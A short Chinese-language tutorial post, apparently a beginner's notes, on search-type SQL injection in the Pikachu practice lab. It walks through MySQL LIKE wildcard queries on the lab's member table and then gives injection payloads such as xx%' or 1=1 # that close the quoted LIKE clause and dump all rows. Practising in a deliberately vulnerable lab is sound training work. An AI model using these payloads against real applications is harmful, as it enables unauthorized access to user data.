Pikachu靶场搜索型SQL注入

bb小萌新2023-12-29 5:02

在 MySQL 的 bin 路径下打开 cmd ，输入下面的命令，再输入 数据库的密码

复制代码

mysql -u root -p

show databases;

use pikachu

desc member;

select id,username,email from member;

select id,username,email from member where id=1;

select id,username,email from member where username='vince';

select id,username,email from member where username='vin';

%vin ：查询 以vin结尾 的名称

复制代码

select id,username,email from member where username='%vin';

select id,username,email from member where username like '%vin';

select id,username,email from member where username like 'vin%';

select id,username,email from member where username like '%vin%';

select id,username,email from member where username like '%%vin%%';

在Pikachu靶场里查询

复制代码

xx' or 1=1 #

要注意 闭合% ，让信息查的全

复制代码

xx%' or 1=1 #

%xx%' or 1=1 #

Pikachu靶场 搜索型SQL注入

Pikachu靶场搜索型SQL注入